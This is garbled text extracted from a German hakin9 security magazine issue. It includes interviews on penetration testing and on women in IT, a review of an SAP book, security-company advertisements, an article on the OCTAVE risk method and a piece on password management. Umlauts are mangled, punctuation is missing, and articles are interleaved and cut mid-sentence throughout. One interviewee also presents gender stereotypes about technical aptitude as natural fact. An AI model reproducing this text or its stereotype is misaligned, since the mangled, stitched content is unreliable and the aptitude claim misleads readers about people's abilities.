nicht als Pruuml-fungen ihrer persoumlnlichen Kompetenz sondern als kon-krete Unterstuumltzung fuumlr die Verbesserung vorhandener Sicherheitsprozesse
Im Bereich der technischen Schwachstellen werden weiterhin Webanwendungen eine groszlige Rolle spielen Daher bin ich seit geraumer Zeit beim Open Web Appli-cation Security Project (OWASP) den meisten vermut-lich durch die OWASP Top 10 bekannt ehrenamtlich taumltig und seit diesem Jahr im Board der deutschen Sek-tion Beim OWASP Stammtisch Stuttgart (und Stamm-tischen in anderen Staumldten) tauschen sich hier auch Menschen rund um das Thema zwanglos aus Wer Lust hat vorbeizukommen kann sich auf der deutschen OWASP Webseite informieren
Wir bedanken uns fuumlr das Gespraumlch
Framework darstellt und nicht den n-ten Port- oder Vul-nerability-Scanner Wenn wir Bugs in den verwendeten Programmen feststellen oder Ideen fuumlr Erweiterungen haben geben wir diese direkt in die Community zuruumlck
hakin9 Wer sind Benutzer von tajanasTobias Glemser Zum einen natuumlrlich wir selbst Zum anderen setzten IT-Sicherheitsbeauftragte und IT-Revi-soren das Tool fuumlr regelmaumlszligige Sicherheitspruumlfungen ihrer Netze ein
hakin9 Fuumlr welche Faumllle reichen Penetrationstests nicht ausTobias Glemser Das haumlngt von der Zieldefinition des Kunden ab und was man unter einem Penetrationstest versteht Bei Tele-Consulting sind alle Mitarbeiter nicht nur in technische Audits wie Penetrationstests eingebun-den sondern auch in prozessorientierte Beratungen und Audits wie z B ISO 27001 oder BSI IT-Grundschutz Dies ermoumlglicht es uns in technischen Audits nicht nur die technischen Luumlcken aufzuzeigen sondern auch auf fehlende oder mangelhafte Prozesse hinzuweisen und konkrete Vorschlaumlge zur Verbesserung zu geben
hakin9 Koumlnnen Sie uns ein konkretes Beispiel nennenTobias Glemser Nehmen wir an dass aus Wirtschaft-lichkeitsgruumlnden nicht alle Server in einem Netz in ein technisches Audit einbezogen werden sondern nur eine definierte Anzahl Stellt man hier Schwachstellen fest so genuumlgt es nicht die erkannten Schwachstellen oder gar Luumlcken zu schlieszligen sondern man muss sich fra-gen wie es zu den Schwachstellen kommen konnte In den seltensten Faumlllen haben hier Administratoren indi-viduelle Fehler gemacht vielmehr scheinen offensicht-lich die Vorgaben zur Serverkonfiguration bzw Haumlrtung nicht ausreichend zu sein bzw diese in ein Information Security Management System (ISMS) integriert zu sein Darauf weisen wir nachdruumlcklich in unseren Ergebnis-berichten hin um eine Gesamtverbesserung zu erzie-len und unterstuumltzen bei Bedarf auch bei der Umset-zung der organisatorischen Anteile
Geht man diesen Schritt nicht werden erfahrungs-gemaumlszlig nur die Systeme veraumlndert bei denen im Test Schwachstellen erkannt wurden Der Verbesserung der Gesamtsicherheit hilft dies dann allerdings nicht
hakin9 Wie sieht eine Sicherheitsuumlberpruumlfung mithilfe des Penetrationstests ausTobias Glemser Zunaumlchst bedarf es einer klaren Ziel-vorstellung Entweder haben Kunden diese bereits oder sie wird im Rahmen eines Workshops gemeinsam erarbeitet Dabei ist es meist sinnvoll mehrstufig vorzu-gehen und die Themen in verschiedenen Arbeitspake-ten abzuarbeiten Im Rahmen eines Kick-Offs werden die Beteiligten informiert und in den Ablauf integriert
10201044
INTERVIEW
hakin9 Lassen Sie uns bitte ein wenig uumlber sich selbst wissen wer sind Sie was machen Sie und wie ist es dazu gekommen dass Sie in der IT-Branche taumltig sindUlrike Peter Ich bin PR-Spezialistin und Journalis-tin durch und durch Die Liebe zum Schreiben ent-deckte ich fruumlh Nach ersten Gehversuchen als freie Mitarbeiterin bei einer Tageszeitung absolvierte ich vor zehn Jahren ein Volontariat in einer PR-Agentur mit parallelem Fernstudium bdquoJournalismusldquo Die ers-ten Tage in der Agentur waren wie ein Kopfsprung ins kalte Wasser Denn obwohl ich das journalistische Ruumlstzeug besaszlig wusste ich anfangs nicht mal wo sich die Escape-Taste an meinem PC befand hatte aber die Aufgabe ohne spezielles Hintergrundwissen uumlber komplexe Technologien detaillierte Berichte zu formulieren Da dies den Ehrgeiz in mir weckte ar-beitete ich mich schnell in die Materie ein und stell-te fest dass Public Relations in Verbindung mit der Erstellung technologischer Texte mein Steckenpferd ist Heute bin ich Geschaumlftsfuumlhrerin meiner eigenen PR-Agentur und obwohl ich mittlerweile auch in wei-teren Branchen und Aufgabengebieten zuhause bin ist die Freude daran bdquotrockeneldquo und komplexe Inhalte lebendig werden zu lassen noch genauso vorhanden wie am ersten Tag
hakin9 Viele glauben dass Computer Maumlnnersache sind Was halten Sie davonUlrike Peter Die landlaumlufige Meinung existiert nach wie vor dass Maumlnner ein besseres technologisches Verstaumlndnis mitbringen Dies resultiert nicht selten aus Vorurteilen laumlsst sich aber auch nicht komplett abstreiten Denn nicht nur Erfahrungswerte sondern auch Belege aus der Hirnforschung zeigen dass Frauen besser mit Sprache umgehen koumlnnen und Maumlnner sich in Naturwissenschaften wohler fuumlhlen Es liegt wohl ein Stuumlck weit in der Natur der Sache
Aber wie heiszligt es so schoumln bdquoAusnahmen bestaumltigen die Regelldquo Und der Trend zeigt beispielsweise dass Frauen zunehmend technische Studiengaumlnge bele-gen
hakin9 Heutzutage sind wir uumlberall von Computern umgeben In der IT-Branche herrscht trotzdem ein Frauenmangel Woran liegt dies Ihrer Meinung nachUlrike Peter Noch lockt es wesentlich mehr Maumlnner in technische Berufe als Frauen Ich denke das Verhaumlltnis wird auch in Zukunft so bleiben ndash auch wenn sich die klassische Rollenverteilung verschiebt und die bdquoGren-
bdquoErfolgreiche Frauen in der IT-Branche - ein Erfahrungsberichtldquo
Interview mit Ulrike Peter
Interview mit Ulrike Peter
hakin9orgde 45
Vorgesetzten und zum anderen nach den Faumlhigkeiten der Frau Jeder Mitarbeiter der neu eingestellt wird steht vor der Aufgabe sich zu beweisen ndash und sollte die Moumlglichkeit dazu erhalten Jedoch werden Frau-en in typischen Maumlnnerberufen oft kritischer beaumlugt und stehen laumlnger auf dem Pruumlfstand Dies passiert teils unbewusst Auch beweisen Studien immer wie-der dass maumlnnliche Arbeitnehmer im gleichen Job mehr verdienen als weibliche Hier macht die Gesell-schaft aber eine Entwicklung durch und dies reguliert sich sicherlich zumindest ein Stuumlck weit im Laufe der naumlchsten Jahre
hakin9 Was macht Ihnen am meisten Spaszlig bei der Arbeit in der IT-BrancheUlrike Peter Bevor ich mich selbstaumlndig machte war ich bereits in einem anderen Unternehmen in der Ge-schaumlftsleitung taumltig ndash jedoch konnte ich den Stift zum Schreiben nie aus der Hand legen Es reizt mich im-mer wieder neue technologische Themen zu erkunden und dabei nicht nur an der Oberflaumlche zu kratzen son-dern Detailtiefe zu erlangen um fundiert und lesens-wert uumlber ein Thema berichten zu koumlnnen Im Laufe der Jahre habe ich eine starke Affinitaumlt zur IT-Security entwickelt Ich finde es spannend uumlber Sicherheits-luumlcken Verschluumlsselungstechniken und vieles weite-re zu schreiben Daruumlber hinaus macht es mir groszligen Spaszlig IT-Unternehmen durch die richtige PR-Strategie nach vorn zu bringen und entsprechende Maszlignahmen in die Tat umsetzen Beim Kennenlernen eines poten-ziellen Neukunden im ersten Moment manchmal hin-sichtlich der technischen Fachkompetenz unterschaumltzt zu werden und dann schnell durch Know-how zu uumlber-zeugen bestaumltigt mich immer wieder in dem was ich tue
hakin9 Was sollte unternommen werden um die Ressentiments von Frauen gegenuumlber IT-Jobs abzubauenUlrike Peter Ich glaube dem kann man bzw Frau nur entgegenwirken indem sie den Mut hat ihre Interessen zu verfolgen und sie unter Beweis zu stellen Aus Er-fahrung wenn jemand seine Faumlhigkeiten zeigt und en-gagiert an eine Sache herangeht ruumlckt das Geschlecht automatisch in den Hintergrund
Wir bedanken uns fuumlr das Gespraumlch
zenldquo in beide Richtungen mehr und mehr verschwim-men Denn auch Maumlnner finden wir heute in Berufen die vor Jahren ausschlieszliglich Frauen zugeordnet wur-den Und wir sind zwar von elektronischen Geraumlten wie PCs Smartphones etc umgeben und diese werden auch rege von beiden Geschlechtern genutzt ndash aber ei-nen technischen Job zu ergreifen ist ein anderes paar Schuhe Hierzu gehoumlrt ein besonderes Faible Die Be-weggruumlnde weshalb in diesem Segment Frauenman-gel herrscht sind meiner Meinung nach Ihnen fehlt manchmal der Mut sie erhalten nicht immer die glei-chen Chancen oder ndash und das wird der Hauptgrund sein ndash es liegen schlichtweg die Interessen in anderen Be-reichen
hakin9 Woraus resultieren die Vorurteile gegen die Frauen die sich mit Computern beschaumlftigenUlrike Peter Die IT ist (und bleibt es sicher auch) eine Maumlnnerdomaumlne ndash Frauen in der IT-Branche sind Para-diesvoumlgel Wie in allen Berufen in denen seit jeher ein Geschlecht etabliert ist sich Prozesse eingeschliffen und bewaumlhrt haben ist es erst einmal fremd und ge-woumlhnungsbeduumlrftig wenn sie sich veraumlndern So liegen die Vorurteile zum einen daran dass es nicht uumlblich ist wenn Frauen in diesen Berufen arbeiten und Maumlnnern die bdquoTechnikldquo zugeordnet wird ndash zum anderen resultie-ren sie daraus dass die unterschiedlichen Faumlhigkeiten und Interessen der Geschlechter einfach naturgege-ben sind So wie kleine Jungen mit Autos spielen und Maumldchen mit Puppen stecken auch spaumlter gewisse Verhaltensweisen und Interessen in uns die bereits in der Kindheit gepraumlgt werden Greift das weibliche Ge-schlecht im Berufsleben ploumltzlich zum bdquoAutoldquo so ist dies ungewoumlhnlich und wird erst einmal hinterfragt
hakin9 Wie sieht die Situation von Frauen in der IT-Branche aus Ist es leicht als begabte IT-Expertin einen Job in einem Unternehmen zu bekommenUlrike Peter Frauen in der IT-Branche sind haumlufig in Marketingabteilungen zu finden ndash aber zum Beispiel auch bei der schreibenden Zunft in Fachverlagen In diesen Jobs herrscht in meinen Augen Chancengleich-heit Als IT-Expertin in einem technischen Beruf wie Ad-ministrator Entwickler oder Aumlhnliches sieht es dagegen anders aus In diesem Segment haben es weibliche Fachkraumlfte meiner Ansicht nach schwerer Die Huumlrde zum Bewerbungsgespraumlch eingeladen zu werden ist houmlher Bekommt sie die Chance dazu wird vielleicht et-was genauer hingeschaut aber letztlich zaumlhlt die Kom-petenz die unterm Strich den entscheidenden Aus-schlag geben wird
hakin9 Wie werden Frauen von Maumlnnern als ihre Mitarbeiter wahrgenommenUlrike Peter Dies laumlsst sich nicht pauschalisieren und richtet sich zum einen nach der Einstellung des
10201046
REZENSIONEN
Das Buch SAP for DFPS Implementierung und Customizing basiert auf mehr als 20 Jahren Er-fahrung die die Autoren insgesamt bei der Ent-
wicklung Implementierung aber auch Schulung der Loumlsung sammeln konnten
Die uumlber 650 Seiten vollgepacktes Wissen sollten sie nicht abschrecken dieses Buch in die Hand zu nehmen Es ist sehr gut und fluumlssig geschrieben Man schafft es sollten sie ein schneller LeserIn sein in zwei Tagen
Sie benoumltigen keine tiefgreifenden SAP-Kenntnisse zum Verstaumlndnis daher ist es fuumlr Entscheider genauso geeignet wie fuumlr Projektleiter Architekten funktionale Mitarbeiter Basismitarbeiter oder externe Berater
Komplexe Zusammenhaumlnge werden sehr schoumln und bildhaft beschrieben damit auch fuumlr den SAP-Laien das Vorgehen verstaumlndlich beschrieben wird Erwaumlh-nenswert finde ich in diesem Zusammenhang Rubiks Zauberwuumlrfel
Das Buch ist sehr strukturiert aufgebaut und umfasst unverzichtbare Grundlagen in den Teilen I-IIIFuumlr Experten wird es dann in Teil IV richtig spannend und interessant
Die von SAP entwickelte fast eierlegende Wollmilch-sau erfordert ein umfangreiches Nachschlagewerk zur Implementierung Den Autoren ist dies hiermit gelun-gen
Ihnen ist es auszligerdem gelungen aufzuzeigen wie komplexe bdquoUnternehmensstrukturenldquo bewaumlltigt und Kos-ten reduziert und kontrolliert werden koumlnnen
Das Beispielprojekt bdquoTsunamildquo verdeutlicht dabei an einem nicht so komplexen Projekt die Anforderungen Beleuchtet wird zB wie militaumlrische Kernprozesse wie etwa die Logistik substanzielle Einsparungen von ca 30 erzielen koumlnnten als auch die Unterstuumltzung von Einsaumltzen verbessert werden koumlnnten (Beschleunigung der Verlegung um bis zu 50 -70)
Des Weiteren wird die Interoperabilitaumlt sehr schoumln he-raus gestellt und die integrativen Aspekte stets im Blick behalten
Hervorheben sollte man die organisatorische Flexi-bilitaumlt und Logistik wie das Logistic Assessment Pro-zessmanagement Qualification Management inkl der Uumlbernahme von Trainingsdaten das Managementkon-zept BSC (Balanced Scorcard) die Einsatzmoumlglichkei-ten von mobilen Anwendungen fuumlr Schutzaufgaben SOA und NCW bzw NetFuumlOp mit DFPS
Der Mehrwert wird zB am Meldewesen der NC3A durch Automatisierung von weiten Teilen schoumln heraus gearbeitet
Die ausfuumlhrlichen bebilderten Beispiele stellen eine gelungene Verbindung zwischen Theorie und Praxis bzw Anwendung dar In der SAP-typischen Struktur wurden die neuen und bereits erwaumlhnten Funktionen sinnvoll und gekonnt integriert
Des Weiteren findet sich fuumlr die richtige IT-Architektur ein schoumln gefuumlllter Werkzeugkasten mit den dazuge-houmlrigen Dorsquos and Dontrsquos Natuumlrlich darf auch das best practices nicht fehlen sowie der Ausblick auf zukuumlnftige Entwicklungen
Egal ob sie sich fuumlr eine Neuintegration oder eine Co-re2Defense Loumlsung entscheiden
die Kapitel zu den Themen
moumlchte ich ihnen unbedingt ans Herz legen
FAZITDieses Buch sollte keinem Entscheider und IT-Verant-wortlichen vorenthalten werden
Praumldikat besonders empfehlenswert
Autor Nicole Huck
SAP for DFPSImplementierung und CustomizingGalileo Press Bonn 20101 Auflage 2010AutorenBernhard EscherichHeinrich PfriemerWolfgang Ullwer
Datenschutz ist EU-weit gesetzliche Anforde-
rung Wir sorgen fuumlr die Erfuumlllung rechtlicher
Vorschriften und kuumlmmern uns um ein ange-
messenes Datenschutzniveau in Ihrem Unter-
nehmen auch international
wwwblossey-partnerde
Recommended Sites
Securitymanagerde ist eine Produktion des
Online-Verlag FEiG amp PARTNER Seit dem
Start hat sich Securitymanagerde zu einem
fuumlhrenden Online-Informationsportal in
Deutschland entwickelt und versteht sich als
unabhaumlngiger Informationsdienstleister der
IT- und Information-Security-Branche
wwwsecuritymanagerde
Pericom base camp IT-Security Unser Ziel ist
es unsere Kunden vor moumlglichen Gefahren
fuumlr Ihre IT-Infrastruktur bestmoumlglich zu schuumlt-
zen Neben der Analyse von Risikopotentia-
len durch Security Audits bieten wir durch
die Implementierung von Security-Loumlsungen
Schutz vor konkreten Gefahren
wwwpericomat
Happy-Security ist ein neues Portal mit Secu-
rity-Challanges IT-Quiz Web-Bibliothek Multi-
media-Center amp vielen weiteren Features
wwwhappy-securityde
CloudSafe stellt seinen Nutzern eine Plattform
zur kryptographisch sicheren Ablage und Verwal-
tung von sensiblen Daten zur Verfuumlgung Nutzer
koumlnnen auf CloudSafe beliebig viele Dokumente
in virtuellen Safes ablegen Es koumlnnen weite-
ren Personen individuelle Zugriffsrechte auf die
Safes eingeraumlumt und somit ein sicherer Daten-
austausch ermoumlglicht werden
wwwcloudsafecom
AV-Comparatives geht hervor aus dem Inns-
brucker Kompetenzzentrum und gilt als eines
der bekanntesten unabhaumlngigen Testhaumluser
fuumlr Antiviren-Software
wwwav-comparativesorg
Die Seed Forensics GmbH bietet fuumlr Strafver-
folgungsbehoumlrden professionelle Unterstuumltzung
in den Bereichen der Datensicherstellung und
Datentraumlgerauswertung Selbstverstaumlndlich
entsprechen unsere Mitarbeiter unser tech-
nisches Equipment und auch unsere Raumlumli-
chkeiten den notwendigen Anforderungen
wwwseed-forensicsde
Wollen Sie Ihre Seite empfehlen kontaktieren Sie bitte dehakin9org
Die Netzwerktechnik steht auf wwweasy-ne-
tworkde im Mittelpunkt Artikel Tutorials und
ein Forum bieten genuumlgen Stoff fuumlr kommende
wwweasy-networkde
Computerfreaks houmlher schlagen laumlsst Geek
Wear mit intelligenten Spruumlchen eine riesige
Auswahl Gadgets und natuumlrlich auch viele
Hacker Tools
wwwgetDigitalde
Recommended Companies
SEC ConsultSEC Consult ist der fuumlhrende Berater
fuumlr Information Security Consulting in
Zentraleuropa Die vollstaumlndige Unab-
haumlngigkeit von SW- und HW-Herstellern
macht uns zum echten Advisor unserer
Kunden Unsere Dienstleistungen umfa-
ssen externeinterne Sicherheitsaudits
(Web-) Applikationssicherheit (ONR 17-
700) Sicherheitsmanagement-Prozesse
(ISO 27001) etc
wwwsec-consultcom
SEC Consult
Tele-Consulting GmbH
Sicherheit hakin9 und crsquot Autoren jah-
relange Erfahrung bei der Durchfuumlhrung
von Penetrationstests und Security-Au-
dits eigener Security Scanner bdquotajanasrdquo
Sicherheitskonzepte Risikoanalysen
ISO 27001-Auditoren VoIP-Planung
und -Security
wwwtele-consultingcom
B1 SystemsDie B1 Systems ist international taumltig
in den Bereichen LinuxOpen Source
B1
Systems spezialisiert sich in den Be-
reichen Virtualisierung und Cluster
infob1-systemsde
wwwb1-systemsde
Blossey amp Partner
Consulting DatenschutzbuumlroDatenschutz ist EU-weit gesetzliche An-
forderung Wir sorgen fuumlr die Erfuumlllung
rechtlicher Vorschriften und kuumlmmern
uns um ein angemessenes Daten-
schutzniveau in Ihrem Unternehmen
auch international Wir erledigen alle er-
forderlichen Aufgaben die Faumlden behal-
ten Sie in der Hand Nutzen Sie unser
Erstberatungsgespraumlch
wwwblossey-partnerde
secXtreme GmbHschuumltzt Ihre Web-Anwendungen bis
auf Applikationsebene Dazu gehoumlrt
sowohl die Pruumlfung von Applikationen
(Pentests und Code-Reviews) als auch
Beratungsleistungen fuumlr Sicherheit im
Entwicklungsprozess und Schutzlouml-
sungen (Web Application Firewalls) bei
Mittelstand
wwwsec-Xtremecom
Mabunta
spezialisierter und kompetenter Partner
heitsfragen in allen Unternehmens-
bereichen verbinden Wachstum mit
sicherer Kommunikation
Alles in allem- mabunta bdquoone-face-to-
the-customerldquo Ihr Spezialist in Fragen
wwwmabuntade
Recommended Companies
SecureNet GmbH MuumlnchenAls Softwarehaus und Web Application
Security Spezialist bieten wir Expertise
rund um die Sicherheit von Webanwen-
dungen Anwendungs-Pentests Sour-
delines Beratung rund um den Software
Firewalls Application Scanner Fortify
wwwsecurenetde
underground_8
secure computing gmbhWir entwickeln und vertreiben securi-
und Antispam Unsere Loumlsungen sind
hardwarebasiert und werden uumlber Dis-
tributoren Reseller und Systemintegra-
toren implementiert und vertrieben
wwwunderground8com
OPTIMAbit GmbHWir sind Spezialisten fuumlr Entwicklung
und Mobile Applikationen gegen Angriffe
externer und interner Art Unsere Dien-
ste umfassen Audits Code Reviews
Penetrationstest sowie die Erstellung
von Policies Zusaumltzlich bieten wir Semi-
wwwoptimabitcom
m-privacy GmbH
einfach zu bedienen
So praumlsentieren sich die von m-privacy
tesiegel Es bietet als erstes System
weltweit einen kompletten Schutz vor
Online-Spionage Online-Razzien und
gezielten Angriffen
wwwm-privacyde
NESECNESEC ist Ihr Spezialist fuumlr Penetra-
tionstests Sicherheitsanalysen und
cherheitspruumlfungen Ihrer Netzwerke
und Webapplikationen sowie bei Sour-
ce Code Audits Bei Bedarf optimieren
wir Ihre Policy sensibilisieren Ihre
nehmen nach ISO 27001
wwwnesecde
Seed Forensics GmbH
fuumlr Strafverfolgungsbehoumlrden profe-
ssionelle Unterstuumltzung in den
Bereichen der Datensicherstellung
und Datentraumlgerauswertung Selbst-
verstaumlndlich entsprechen unsere
Mitarbeiter unser technisches Equip-
0ment und auch unsere Raumlumlichkeiten
den notwendigen Anforderungen
wwwseed-forensicsde
Protea Networks
Loumlsungen Verschluumlsselung Firewall
ring etc Wir bieten umfassende Bera-
tung Vertrieb von Security-Hard- und
Software Installation und umfangreiche
nings) Protea setzt auf Loumlsungen der
dafuumlr direkten inhouse-Support bereit
wwwproteanetworksde
secadmsecadm ist durchtrainierter Spezialist fuumlr
Airbags ABS und Sicherheitsgurte in der
Mannjahren Erfahrung beraten entwi-
fuumlr Kunden weltweit Der Fokus liegt da-
und Security-Management Risiko-Analy-
se die Sicherheitsberatung Auditing Se-
curity-Leitfaumlden Software-Entwicklung
wwwsecadmde
OCTAVE
hakin9orgde 25
Um dies zielorientiert und auf die vorhandenen Business Needs maszligzuschneidern sind Risiko-erkennung (Risikoanalyse) und deren anschlie-
szligende Bewertung (Business Impact Analyse) die ersten Schritte die gemacht werden muumlssen
Eine effektive Informations-Sicherheitsbewertung be-trachtet nicht nur den technologischen sondern auch den dahinter liegenden organisatorischen Aspekt Bei-spielsweise die Handhabung der IT-Infrastruktur durch die MitarbeiterInnen bei ihrer taumlglichen Arbeit Durch ei-
ne Risikoanalyse erhaumllt man einen organisationsweiten Uumlberblick uumlber vorhandene Risiken und ist somit integ-raler Bestandteil des Risikomanagements (vergl Abb 1)
OCTAVE ist eine risikobasierende strategische Si-cherheitsbewertungs und -planungstechnik
OCTAVEreg ist ein Kunstwort und setzt sich aus den Begriffen Operationally Critical Threat Asset and Vul-nerability Evaluation zusammen Sie wurde von der Carnegie Mellon University welche auch die populaumlre
OCTAVE ndashHier macht das Risiko die MusikDie uumlberwiegende Mehrheit von Unternehmen sind nach regulativen Vorgaben wie zB Basel II Solvency II SOX 8 EU Auditrichtlinie oder SAS 70 angehalten ein nachhaltiges und nachvollziehbares Risikomanagement und Business Continuity Planning zu implementieren
IN DIESEM ARTIKEL ERFAHREN SIE
ren
WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
men und Standards
Helmut Kaufmann
Abbildung 2 CIAAbbildung 1 Risikomanagementzyklus
10201026
ABWEHR
heitspraxis und Technologie ins Gleichgewicht zu setz-ten Getrieben von zwei Grundaspekten ndash operationel-les Risiko und aktuell eingesetzte Sicherheitspraktiken wird die dahinter liegende Technologie in Zusammen-hang mit der Sicherheitspraxis gegen die drei Eckpfeiler der Sicherheit gepruumlft (vergl Abb 2)
OCTAVE ist ein wertegetriebener Bewertungsansatz Das Analysis Team
die Organisation wichtig sind
diejenigen Werte die als besonders kritisch beur-teilt werden Beruumlcksichtigt die Zusammenhaumlnge zwischen den kritischen Assets den Bedrohungen und den Verwundbarkeiten
menhang
(organisatorisch und auch einen Plan zur Reduzie-rung der Risiken auf kritische Infrastrukturen)
Daraus resultiert ein dreiphasiges Vorgehensmo-dell fuumlr die Erhebung des gesamtorganisatorischen Schutzbeduumlrfnisses (vergl Abb 3)
Aufbau von Asset-basierenden Bedro-
ndash Das Analyse Team stellt informati-
Web-Site wwwcertorg betreibt passend fuumlr die unter-schiedlichsten Unternehmensgroumlszligen als lizenzfreie Risikoanalyse Methode entwickelt
OCTAVE ist eine selbstgesteuerte Methode Das be-deutet dass die MitarbeiterInnen einer Organisation eine wesentliche Rolle bei der Erstellung der Sicher-heitsstrategie uumlbernehmen Risiken von hoch kritisch erkannten Assets werden dazu verwendet um eine entsprechende Priorisierung der Sicherheitsbereiche durchzufuumlhren
Im Gegensatz zu typischen technologielastigen Be-wertungsmethoden die technologische Risiken und taktische Sachverhalte in den Mittelpunkt der Betrach-tung stellen ist OCTAVE auf organisatorische Risiken und deren dazu notwendigen Technologieeinsatz aus-gerichtet Sie ist eine aumluszligerst flexible Methode die fuumlr fast alle Organisationen speziell angepasst werden kann Aus der Sichtweise des Autors ist einer der be-merkenswertesten Vorteile jedoch dass die Methode von den MitarbeiterInnen selbst schnell erlernt und kon-tinuierlich durchgefuumlhrt werden kann und somit nach-haltig in den Risikomanagementprozess ohne weitere Kosten integrierbar ist
Ein ausgewaumlhltes kleines Team aus allen operatio-nellen Bereichen der Organisation inklusive der IT Ab-teilung arbeiten zusammen um die Sicherheitsbeduumlrf-nisse der Organisation zu identifizieren und versuchen die Gebiete Operationelles Risiko eingesetzte Sicher-
Abbildung 3 Octave Phasen
OCTAVE
hakin9orgde 27
onsbezogene Assets und deren Impact auf die Or-ganisation sowie deren derzeitige Schutzmechanis-men fest Darauf aufbauend werden die kritischsten
dafuumlr bestimmt Anschlieszligend wird fuumlr jedes kri-
Erkennen von Verwundbarkeiten der Infra-
struktur ndash Hier wird die hinter den kritischen Assets liegende Infrastruktur bewertet Dabei werden kriti-sche Infrastrukturpfade und informationstechnolo-gische Komponentenklassen aufgestellt und einer technischen Uumlberpruumlfung ndash dem Penetration Test ndash
tung direkt ein
ndash In dieser Phase ent-scheidet das Analyse-Team wie mit den kritischen Assets umgegangen werden soll Basierend auf die
organisationsweite Schutzstrategie und ein Plan fuumlr die Reduzierung der erkannten Risiken die auf die kritischen Assets und deren Infrastrukturen einwir-ken koumlnnen erstellt
Die einzelnen Prozesse die den drei Phasen hinter-legt sind stellen sicher dass von allen Organisati-
onseinheiten und von allen hierarchischen Ebenen ndash also von den MitarbeiterInnen uumlber operationa-les und strategisches Management bis hin zum Ma-nagement der ersten Ebene alle Sichtweisen und die damit verbundenen Bewertungen der kritisch-
koumlnnen OCTAVE generiert so eine organisationsweite Sicht
auf die aktuellen Informationssicherheitsrisiken
zen
wie die erstellte Schutzstrategie und der Plan zur Risikoreduzierung umgesetzt werden kann
Handlungs-Planes
UumlberwachenBeobachten des Handlungsplanes nach Effektivitaumlt Das beinhaltet zB das Beobachten der Risiken fuumlr jede Aumlnderung
ken
Die OCTAVE Methode ersetzt kein Risikomanagement sondern gehoumlrt in ein strukturiertes Risikomanage-
Abbildung 4 Octave und Risikomanagement
10201028
ABWEHR
ment eingebettet welches nach einem act Zyklus arbeitet (vergl Abb 4)
Die Organisation sollte in periodischen Abstaumlnden ihre ermittelte Baseline zuruumlcksetzen indem eine nochmalige Risikoanalyse durchgefuumlhrt wird Diese Zeitspanne kann vorgegeben werden oder von wich-tigen Ereignissen wie zB eine Restrukturierungs-maszlignahme der zB Netzwerkinfrastruktur uvm an-gestoszligen werden Zwischen den Analysen kann die Organisation periodisch neue Risiken identifizieren analysieren und in Relation zu bereits existieren-den Risiken Risiko reduzierende Maszlignahmen entwi-ckeln
Da die Risikoanalyse nur einen Teil des Risikoma-nagements darstellt ist die OCTAVE Methode mit ih-rer offenen Schnittstelle hervorragend geeignet um als bdquoBest Practiceldquo-Grundlage die ISO 27001 Norm zu im-
plementieren und in der Umsetzungsphase den COBIT 40 Standard zu verwenden
OCTAVE bildet die Grundlage der in der ISO 27001
trachtungsbereiches feststellen von kritischen Orga-nisationswerten qualitative und eventuell quantitative Betrachtung von Risiken Entwicklung von entspre-chenden Kontrollmaszlignahmen um Risiken zu minimie-ren oder aber auch zu akzeptieren Anschlieszligend kann man unter Zuhilfenahme von COBIT die der ISO Norm zugeschriebenen Kontrollen implementieren Man kann somit die IT Sicherheitsstrategie der betrachteten Organisation mit einer Risikoanalyse nach dem OCTA-VE Ansatz und dem standardisierten Reifegrad-Modell nach COBIT - gepruumlft nach ISO 27001 - auswerten und umsetzen (Verg Abb 5)
Abbildung 5 Mapping auf ISO 27001
Mehr Informationenwwwcertorgoctave
wwwisacaorgwwwstandards-onlinenetInformationSecurity-
Standardhtm
MAG HELMUT KAUFMANN MSCDozent an der Fachhochschule St Poumllten und ua taumltig im Be-reich Secure Data Center Management Cloud Computing Di-saster Recovery and Business Continuity Fraud Detection
News
hakin9orgde 29
Tausende Passwoumlrter von Usern und Administratoren sind im UmlaufMan stelle sich komplexe IT Landschaften vor die geo-
grafisch verteilt sind und viele Mitarbeiter die in verschie-
dene bdquoRollenldquo schluumlpfen Eine Buchhalterin hat nicht nur
Zugang zu standardisierten Anwendungen sondern auch
zum Internetbanking der FIBU Software und anderen
kaufmaumlnnischen Programmen wie SAP Interessant und
zunehmend komplex wird es bei den IT Administratoren
Natuumlrlich koumlnnen sich diese von vielen fuumlr ihre mathema-
tischen Faumlhigkeiten bewunderten auch nicht dutzende
von Passwoumlrtern merken sondern helfen etwas nach Pro
Anwendung wird ein Passwort vergeben das sich diese
dann fuumlr laumlngere Zeit im Gedaumlchtnis behalten Mit dieser
Feststellung wird die gesamte Problematik sofort offenbar
ohne in technische Details gehen zu muumlssen ein Pass-
wort fuumlr laumlngere Zeit im Gedaumlchtnis
Guter Rat ist teuer - und umsonstRichtlinien zur Passwortgestaltung gibt es unzaumlhlige und
viele sind gut gemeint Die Laumlnge wird vorgegeben und
auch die zu verwendenden Zeichen die alle 4 Wochen
zu aumlndern sind und natuumlrlich nicht auf einem Post-It unter
der Tastatur kleben sollen Selbst wenn dies eingehal-
ten wird vergisst man sein neues Passwort spaumltestens
wenn man 2 Wochen auf Urlaub war und auch der Help-
Desk freut sich dass man wieder zuruumlck ist Auch der
Auditor ist zumindest milde gestimmt wenn die zentralen
Passwoumlrter zumindest in einer gesicherten Excel Liste
zusammengefasst sind Von IT Security sollte man aber
dabei besser nicht sprechen da jeder Administrator auf
alle Passwoumlrter zugreifen kann Spaumltestens bei automa-
tisierten (unattended) Passwoumlrtern die via Skript fixiert
sind und auf eine Anwendung oder Datenbank zugreifen
sind verhaltensorientierte Ansaumltze obsolete
Passwortstruktur ist unbekanntKaum ein IT Verantwortlicher hat verlaumlssliche Informa-
tionen uumlber die Strukturen und Verbreitungsgrade von
Passwoumlrtern in einer Organisation Bei Implementie-
rung eines automatisierten Passwort-Managements
wird oft erst festgestellt dass zehntausende privilegier-
te Administratorkonten vorhanden sind aber nur 20
davon als Administratorkonten dienen Der uumlberwiegen-
de Teil der Passwoumlrter sind Application-to-Application
(A2A) und Application-to-Database (A2D) Konten die
in Skripts den Zugriff ermoumlglichen Und natuumlrlich nur in
seltensten Faumlllen geaumlndert werden und somit immer ei-
ne Hintertuumlre auch fuumlr den Ex-Mitarbeiter offenlassen
Die Passwort Autoritaumlt Freiwilligkeit und Empfehlungen sind nicht angebracht Die Zugangsberechtigungen sind als Schluumlssel fuumlr Safes
mit allen Geheimnissen der Organisation anzusehen Das
Ergebnis einer Reflektion der Problematik bdquoPasswoumlrterldquo
kann nur sein dass ein automatisiertes und auditierbares
Software-Werkzeug in Frage kommen kann Die Durchset-
zung der Passwoumlrter Policies Zuteilung von Einmal-Pass-
woumlrtern und vor allem eine sichere Authentifizierung und
Ablage dieser ist natuumlrlich ebenso ein Must-Have In Zeiten
